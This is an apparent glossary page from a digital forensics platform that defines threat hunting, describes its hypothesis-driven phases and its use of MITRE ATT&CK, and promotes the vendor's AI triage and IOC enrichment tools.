Threat Hunting
The proactive, hypothesis-driven search for adversary activity that has evaded existing security controls.
Definition
Threat hunting is the practice of manually searching through networks, endpoints, and datasets to detect threats that automated controls have not flagged. Unlike reactive incident response, hunting is initiated by an analyst who forms a hypothesis — based on threat intelligence, attacker TTPs, or anomalous data — and then sets out to prove or disprove it.
Why It Matters
Automated detections operate on known signatures and rules. Skilled adversaries specifically craft their operations to avoid these controls. Threat hunting closes the gap by applying human reasoning and contextual knowledge to discover stealthy intrusions, lateral movement, and persistence mechanisms that would otherwise go undetected until significant damage has occurred.
How It Works
A hunt typically follows three phases: hypothesis formation (e.g., 'has this network seen Living-off-the-Land techniques consistent with APT29?'), data collection and analysis (querying logs, EDR telemetry, and network data for evidence), and response and documentation (escalating confirmed findings and converting validated hypotheses into new automated detections). MITRE ATT&CK is the standard framework for structuring hunt hypotheses around adversary behaviors.
DFIR Platform
AI Triage
The DFIR Lab AI Triage supports threat hunting by mapping findings to MITRE ATT&CK techniques and generating detection rules that encode hunt results as reusable Sigma or YARA rules. IOC Enrichment provides the reputation, geolocation, and threat context needed to investigate suspicious indicators discovered during a hunt
View DocumentationRelated Concepts
Try these concepts in practice
Free tier with 100 credits/month. No credit card needed.